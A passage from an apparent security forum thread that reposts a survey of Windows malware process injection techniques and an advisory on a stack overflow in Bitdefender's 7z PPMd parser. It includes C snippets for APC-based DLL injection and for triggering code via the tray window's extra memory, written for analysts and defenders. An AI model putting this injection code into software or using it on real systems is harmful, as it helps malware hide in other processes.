    Malware can insert the location of their malicious library under the Appinit_Dlls registry key to have another process load their library. Every library under this registry key is loaded into every process that loads User32.dll. User32.dll is a very common library used for storing graphical elements such as dialog boxes. Thus, when a malware modifies this subkey, the majority of processes will load the malicious library. Figure 6 demonstrates the trojan Ginwui relying on this approach for injection and persistence. It simply opens the Appinit_Dlls registry key by calling RegCreateKeyEx, and modifies its values by calling RegSetValueEx.

    Figure 6: Ginwui modifying the AppInit_DLLs registry key
    Sha256: 9f10ec2786a10971eddc919a5e87a927c652e1655ddbbae72d376856d30fa27c

    AppCertDlls

    This approach is very similar to the AppInit_DLLs approach, except that DLLs under this registry key are loaded into every process that calls the Win32 API functions CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, CreateProcessWithTokenW, and WinExec.

    Image File Execution Options (IFEO)

    IFEO is typically used for debugging purposes. Developers can set the "Debugger" value under this registry key to attach a program to another executable for debugging. Therefore, whenever the executable is launched, the program that is attached to it will be launched. To use this feature you can simply give the path to the debugger and attach it to the executable that you want to analyze. Malware can modify this registry key to inject itself into the target executable. In Figure 7, the Diztakun trojan implements this technique by modifying the debugger value of Task Manager.

    Figure 7: Diztakun trojan modifying the IFEO registry key
    Sha256: f0089056fc6a314713077273c5910f878813fa750f801dfca4ae7e9d7578a148

    7. APC INJECTION AND ATOMBOMBING

    Malware can take advantage of Asynchronous Procedure Calls (APC) to force another thread to execute their custom code by attaching it to the APC queue of the target thread. Each thread has a queue of APCs which are waiting for execution upon the target thread entering an alertable state. A thread enters an alertable state if it calls the SleepEx, SignalObjectAndWait, MsgWaitForMultipleObjectsEx, WaitForMultipleObjectsEx, or WaitForSingleObjectEx functions. The malware usually looks for any thread that is in an alertable state, and then calls OpenThread and QueueUserAPC to queue an APC to that thread. QueueUserAPC takes three arguments: 1) a handle to the target thread; 2) a pointer to the function that the malware wants to run; and 3) the parameter that is passed to the function pointer. In Figure 8, Almanahe malware first calls OpenThread to acquire a handle of another thread, and then calls QueueUserAPC with LoadLibraryA as the function pointer to inject its malicious DLL into another thread.

    AtomBombing is a technique that was first introduced by enSilo research, and then used in Dridex V4. As we discussed in detail in a previous post, the technique also relies on APC injection. However, it uses atom tables for writing into the memory of another process.

    Figure 8: Almanahe performing APC injection
    Sha256: f74399cc0be275376dad23151e3d0c2e2a1c966e6db6a695a05ec1a30551c0ad
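    A minimal C sketch of the QueueUserAPC call (assumes the DLL path has already been written into the target process at remotePath, as in technique 1):

      #include <windows.h>

      BOOL queue_apc(DWORD threadId, LPVOID remotePath)
      {
          HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, threadId);
          if (!hThread) return FALSE;

          /* LoadLibraryA becomes the APC routine; it runs the next time the
             thread enters an alertable wait (SleepEx, WaitForSingleObjectEx, ...) */
          PAPCFUNC fn = (PAPCFUNC)GetProcAddress(
              GetModuleHandleA("kernel32.dll"), "LoadLibraryA");

          DWORD ok = QueueUserAPC(fn, hThread, (ULONG_PTR)remotePath);
          CloseHandle(hThread);
          return ok != 0;
      }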
    8. EXTRA WINDOW MEMORY INJECTION (EWMI) VIA SETWINDOWLONG

    EWMI relies on injecting into the extra window memory of the Explorer tray window, and has been used a few times among malware families such as Gapz and PowerLoader. When registering a window class, an application can specify a number of additional bytes of memory, called extra window memory (EWM). However, there is not much room in EWM. To circumvent this limitation, the malware writes code into a shared section of explorer.exe, and uses SetWindowLong and SendNotifyMessage to have a function pointer point to the shellcode, and then execute it.

    The malware has two options when it comes to writing into a shared section. It can either create a shared section and have it mapped both to itself and to another process (e.g., explorer.exe), or it can simply open a shared section that already exists. The former has the overhead of allocating heap space and calling NtMapViewOfSection in addition to a few other API calls, so the latter approach is used more often. After the malware writes its shellcode in a shared section, it uses GetWindowLong and SetWindowLong to access and modify the extra window memory of "Shell_TrayWnd". GetWindowLong is an API used to retrieve the 32-bit value at the specified offset into the extra window memory of a window class object, and SetWindowLong is used to change values at the specified offset. By doing this, the malware can simply change the offset of a function pointer in the window class, and point it to the shellcode written to the shared section.

    Like most other techniques mentioned above, the malware needs to trigger the code that it has written. In previously discussed techniques, malware achieved this by calling APIs such as CreateRemoteThread, QueueUserAPC, or SetThreadContext. With this approach, the malware instead triggers the injected code by calling SendNotifyMessage. Upon execution of SendNotifyMessage, Shell_TrayWnd receives and transfers control to the address pointed to by the value previously set by SetWindowLong. In Figure 9, a malware named PowerLoader uses this technique.

    Figure 9: PowerLoader injecting into extra window memory of the shell tray window
    Sha256: 5e56a3c4d4c304ee6278df0b32afb62bd0dd01e2a9894ad007f4cc5f873ab5cf
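    A C sketch of the repoint-and-trigger step only (the EWM offset and the message are placeholders, and the shellcode is assumed to already sit in a section shared with explorer.exe):

      #include <windows.h>

      void trigger_ewmi(LONG shellcodeAddrInExplorer)
      {
          HWND tray = FindWindowA("Shell_TrayWnd", NULL);
          if (!tray) return;

          LONG saved = GetWindowLongA(tray, 0);        /* offset 0: placeholder */
          SetWindowLongA(tray, 0, shellcodeAddrInExplorer);

          /* Delivering a message makes the window code dereference the
             repointed value, transferring control to the shellcode */
          SendNotifyMessageA(tray, WM_PAINT, 0, 0);

          SetWindowLongA(tray, 0, saved);              /* restore the original */
      }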
    9. INJECTION USING SHIMS

    Microsoft provides shims to developers mainly for backward compatibility. Shims allow developers to apply fixes to their programs without the need to rewrite code. By leveraging shims, developers can tell the operating system how to handle their application. Shims are essentially a way of hooking into APIs and targeting specific executables. Malware can take advantage of shims to target an executable for both persistence and injection. Windows runs the Shim Engine when it loads a binary to check for shimming databases in order to apply the appropriate fixes.

    There are many fixes that can be applied, but malware's favorites are the ones that are somewhat security related (e.g., DisableNX, DisableSEH, InjectDLL, etc.). To install a shimming database, malware can deploy various approaches. For example, one common approach is to simply execute sdbinst.exe and point it to the malicious sdb file. In Figure 10, an adware, "Search Protect by Conduit", uses a shim for persistence and injection. It performs an "InjectDLL" shim into Google Chrome to load vc32loader.dll. There are a few existing tools for analyzing sdb files, but for the analysis of the sdb listed below, I used python-sdb.

    Figure 10: SDB used by Search Protect for injection purposes
    Sha256: 6d5048baf2c3bba85adc9ac5ffd96b21c9a27d76003c4aa657157978d7437a20

    10. IAT HOOKING AND INLINE HOOKING (A.K.A USERLAND ROOTKITS)

    IAT hooking and inline hooking are generally known as userland rootkits. IAT hooking is a technique that malware uses to change the import address table. When a legitimate application calls an API located in a DLL, the replaced function is executed instead of the original one. In contrast, with inline hooking, malware modifies the API function itself. In Figure 11, the malware FinFisher performs IAT hooking by modifying where CreateWindowEx points.

    Figure 11: FinFisher performing IAT hooking by changing where CreateWindowEx points to
    Sha256: f827c92fbe832db3f09f47fe0dcaafd89b40c7064ab90833a1f418f2d1e75e8e

    CONCLUSION

    In this post, I covered ten different techniques that malware uses to hide its activity in another process. In general, malware either directly injects its shellcode into another process or it forces another process to load its malicious library. In Table 1, I have classified the various techniques and provided samples to serve as a reference for observing each injection technique covered in this post. The figures included throughout the post will help the researcher recognize the various techniques when reversing malware.

    Table 1: Process injection can be done by directly injecting code into another process, or by forcing a DLL to be loaded into another process

    Attackers and researchers regularly discover new techniques to achieve injection and provide stealth. This post detailed ten common and emerging techniques, but there are others, such as COM hijacking. Defenders will never be "done" in their mission to detect and prevent stealthy process injection because adversaries will never stop innovating. At Endgame, we constantly research advanced stealth techniques and bring protections into our product. We layer capabilities which detect malicious DLLs that load on some persistence (like AppInit DLLs, COM Hijacks, and more), prevent many forms of code injection in real-time via our patented shellcode injection protection, and detect malicious injected payloads running in memory delivered through any of the above techniques through our patent-pending fileless attack detection techniques. This approach allows our platform to be more effective than any other product on the market in protecting against code injection, while also maximizing resiliency against bypass due to emerging code injection techniques.

    Sursa: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
  18. July 18, 2017

    Bitdefender: Remote Stack Buffer Overflow via 7z PPMD

    If you read my previous blog post and were bored by it, then this might be for you. With the second post of the series, I am delivering on the promise of discussing a bug that occurs in a more complex setting. A bug in a software module that extracts a prominent archive format (such as 7z) needs to be treated with great caution. It is often critical not only for the software itself, but also for many different software products that are sharing the same library or are based on the same reference implementation. So, does this bug affect Igor Pavlov's 7z reference implementation [1]? Well, I believe it does not. However, it would not surprise me if products other than Bitdefender were affected by this.

    Introduction

    After having found critical bugs in anti-virus products of smaller vendors, I eventually decided to have a look at Bitdefender's anti-virus product. Therefore, I started my fuzzing engine and after a couple of hours I had the first crashes, which involved the 7z file format. 7z is quite complex. The file format itself is non-trivial, and the many compression methods it supports are so, too. Fortunately, only some parts of the file format and the so-called PPMd codec are relevant to this bug. PPMd is a compression algorithm originally developed by Dmitry Shkarin [2]. It makes use of prediction by partial matching [3] and combines it with range encoding [4]. In essence, prediction by partial matching is the idea of building a model that tries to predict the next symbol given the n previous symbols. The context stores the sequence consisting of the last n symbols, and the constant n is called the order of the model. I hope that this basic information will suffice to understand what follows. In case you like to read more about PPM, I strongly recommend the paper by Cleary and Witten [5]. Alternatively, Mark Nelson's blog post [6] is a great read, too.

    Getting Into the Details

    Debugging a crash that occurs deep in 7z code of an anti-virus product is a nightmare if you have no symbols. A possible remedy is to take the reference implementation and try to match the function names. Even though Bitdefender seems to reuse [7] 7-Zip code, it is not exactly trivial to do this, because the compiler has applied a lot of inlining and even interprocedural optimization. Having matched the most important 7-Zip functions, we can step through carefully with WinDbg and easily observe that there is an overflow of the stack-allocated ps buffer in the function CreateSuccessors. In the most recent 7-Zip version, the (first half of the) function looks as follows [8].

      static CTX_PTR CreateSuccessors(CPpmd7 *p, Bool skip)
      {
        CPpmd_State upState;
        CTX_PTR c = p->MinContext;
        CPpmd_Byte_Ref upBranch = (CPpmd_Byte_Ref)SUCCESSOR(p->FoundState);
        CPpmd_State *ps[PPMD7_MAX_ORDER]; /* PPMD7_MAX_ORDER == 64 */
        unsigned numPs = 0;

        if (!skip)
          ps[numPs++] = p->FoundState;

        while (c->Suffix)
        {
          CPpmd_Void_Ref successor;
          CPpmd_State *s;
          c = SUFFIX(c); /* SUFFIX(c) == c->Suffix */
          if (c->NumStats != 1)
          {
            for (s = STATS(c); s->Symbol != p->FoundState->Symbol; s++);
          }
          else
            s = ONE_STATE(c);
          successor = SUCCESSOR(s);
          if (successor != upBranch)
          {
            c = CTX(successor);
            if (numPs == 0)
              return c;
            break;
          }
          ps[numPs++] = s;
        }

        /* ### Rest of function omitted. ### */
      }

    We see that the current context (a linked list) is traversed, filling the ps buffer. It is striking that there is no bound check whatsoever.
    So, if this is the code from the original 7-Zip implementation, can this be correct? Recall that the order of the model is the number of symbols that can be stored in the context. If the context is always updated correctly, it should never contain more elements than the order of the model. So how is a correct update ensured? No matter what the actual mechanism is, it will definitely need to know the order of the model. The name PPMD7_MAX_ORDER is already hinting at the fact that 64 is the maximum order. The actual order, however, may be different. The 7-Zip source code reveals what we are looking for [9].

      STDMETHODIMP CDecoder::SetDecoderProperties2(const Byte *props, UInt32 size)
      {
        if (size < 5)
          return E_INVALIDARG;
        _order = props[0];
        UInt32 memSize = GetUi32(props + 1);
        if (_order < PPMD7_MIN_ORDER ||
            _order > PPMD7_MAX_ORDER ||
            memSize < PPMD7_MIN_MEM_SIZE ||
            memSize > PPMD7_MAX_MEM_SIZE)
          return E_NOTIMPL;
        if (!_inStream.Alloc(1 << 20))
          return E_OUTOFMEMORY;
        if (!Ppmd7_Alloc(&_ppmd, memSize, &g_BigAlloc))
          return E_OUTOFMEMORY;
        return S_OK;
      }

    (Note that this is not the code running in Bitdefender's engine.)

    We see that the order is read from the props array. As it turns out, props is read directly from the input file. More specifically, this is the Properties array contained in the Folder structure of 7z's file format [10]. Moreover, we see that the reference implementation makes sure that the order is not greater than PPMD7_MAX_ORDER. The order byte of my crashing input is 0x5D, and Bitdefender's 7z module extracts it anyway. Hence, they omitted this check. This results in a stack buffer overflow.

    On Attacker Control

    The attacker can fully control the order byte, the maximum order being 255. This allows her to insert up to 255 pointers into the buffer, 191 of which are out of bounds. Those pointers point to CPpmd_State structs of the following type (defined in Ppmd.h).

      typedef struct
      {
        Byte Symbol;
        Byte Freq;
        UInt16 SuccessorLow;
        UInt16 SuccessorHigh;
      } CPpmd_State;

    Note that all struct members are attacker controlled.

    Exploitation and Impact

    Bitdefender uses a stack canary, as well as ASLR and DEP. Interestingly, they do not seem to use SafeSEH for a large part of the system. The reason for this is that Bitdefender's core dynamically loads most of its modules (such as the 7z module) from binary plug-in files which are in a proprietary binary format (i.e., they are not Windows DLLs). More specifically, the engine contains a loader that allocates memory, reads the plug-in files from the file system, decrypts and decompresses them, and then finally relocates the code. Hence, they do not use the Windows PE image loader for a large fraction of the executed code, making it very difficult (if not impossible) to use the full SafeSEH protection mechanism. It seems that they work around this restriction by avoiding the use of exceptions within code of their plug-ins. [11]

    The engine runs unsandboxed and as NT Authority\SYSTEM. Moreover, since the software uses a file system minifilter, this vulnerability can be easily exploited remotely, for example by sending an email with a crafted file as attachment to the victim. Note also that Bitdefender's engine is licensed to many different anti-virus vendors such as F-Secure or G Data, all of which could be affected by this bug. [12]

    The Fix

    Bitdefender decided to fix the bug by ensuring that the function CreateSuccessors throws an error as soon as the variable numPs (the index into the ps buffer) reaches the value PPMD7_MAX_ORDER. They still accept an order greater than PPMD7_MAX_ORDER, but the extraction process aborts just when numPs == PPMD7_MAX_ORDER.
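    For illustration, a guard of that kind might look as follows at the end of the while loop of CreateSuccessors (a minimal sketch, not Bitdefender's actual patch, assuming the caller treats a NULL return as a fatal decoding error):

      if (successor != upBranch)
      {
        c = CTX(successor);
        if (numPs == 0)
          return c;
        break;
      }
      if (numPs >= PPMD7_MAX_ORDER)
        return NULL; /* added: storing another pointer would overflow ps[] */
      ps[numPs++] = s;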
    This kind of design choice is common practice in the anti-virus industry. They all like to parse and process files in a relaxed fashion. In particular, they are inclined to accept various kinds of (partially) invalid files. The reason for this is essentially that there exist many different variants of consumer software processing popular file formats (such as rar, zip or 7z). The aim of relaxed file parsing and processing is to cover as many implementations as possible, and to avoid the scenario in which the anti-virus product dismisses a file as invalid that is then successfully processed by some consumer software. Considering this mindset when it comes to invalid files, it may very well be that the check of the PPMd order was omitted deliberately in the first place.

    Conclusion

    We have seen that it can be challenging to incorporate external code into your software without introducing critical bugs. When you cannot avoid using external C/C++ code, you should review it with utmost diligence. This bug, for example, could have been caught quite easily by a thorough review. Note also that it requires a rather involved argument to explain why the buffer in CreateSuccessors cannot overflow, given that the order is not greater than PPMD7_MAX_ORDER. I do not even try to make such an argument, because I believe it should not be required. If the function being free from buffer overflows strongly depends on several other functions and how they update the state, are we not doing something terribly wrong?

    Do you have any comments, feedback, doubts, or complaints? I would love to hear them. You can find my email address on the about page.

    Timeline of Disclosure

    02/11/2017 - Discovery
    02/13/2017 - "Thank you for your report, we will investigate and come back with an answer."
    02/21/2017 - Confirmed and patch rolled out
    02/28/2017 - Bug bounty paid

    Thanks & Acknowledgements

    I want to thank Bitdefender and especially Marius for their fast response as well as their quick patch. In today's anti-virus industry, this is (unfortunately) not something that can be taken for granted.

    Test File

    If you would like to test quickly whether a 7z implementation might be vulnerable, you can try to let it extract this test archive. It is a 7z archive containing a file foo.txt, which itself contains the ASCII string bar. foo.txt is compressed using PPMd with order 65 (recall that PPMD7_MAX_ORDER == 64 in the reference implementation). Note that this file will not cause a stack buffer overflow with the reference implementation even if the order is not checked properly. However, in case a system extracts the file foo.txt successfully (recovering the string bar), this is a strong indication that the order is not checked properly, and you should investigate further whether it is vulnerable to the stack buffer overflow or not.

    Footnotes

    [1] http://www.7-zip.org/
    [2] http://compression.ru/ds/
    [3] https://en.wikipedia.org/wiki/Prediction_by_partial_matching
    [4] https://en.wikipedia.org/wiki/Range_encoding
    [5] http://ieeexplore.ieee.org/document/1096090/
    [6] http://marknelson.us/1991/02/01/arithmetic-coding-statistical-modeling-data-compression/#part2
    [7] Well, the code is very similar, but they changed a few things. For example, they have ported most (if not all) of the C code to C++.
    [8] CreateSuccessors is located in C/Ppmd7.c of the most recent 7-Zip 17.00.
        Note that the actual code running in Bitdefender is slightly different. However, I believe that the differences are not relevant to this bug.
    [9] CDecoder::SetDecoderProperties2 is located in CPP/7zip/Compress/PpmdDecoder.cpp of the most recent 7-Zip 17.00.
    [10] The 7z file format is documented (partially) in the file DOC/7zFormat.txt of the 7-Zip source package.
    [11] This requires rewriting a lot of the C++ code that is incorporated into the product. 7-Zip, for example, relies on exceptions at various places.
    [12] G Data's anti-virus product is the only one I explicitly checked, and it is definitely affected. Other products are very likely affected, too, if they use Bitdefender's 7z module.

    Sursa: https://landave.io/2017/07/bitdefender-remote-stack-buffer-overflow-via-7z-ppmd/
  19. Awesome, I didn't know someone had already made one. I asked Domas after his DEF CON talk whether a "demovfuscator" could be built, and he said it's theoretically possible, but difficult.
  20. Nytro

    Fun stuff

  21. Try the peasant version of optimization: get a good, expensive dedicated server.
  22. The guy who made this is a genius. A hacker in the true sense of the word.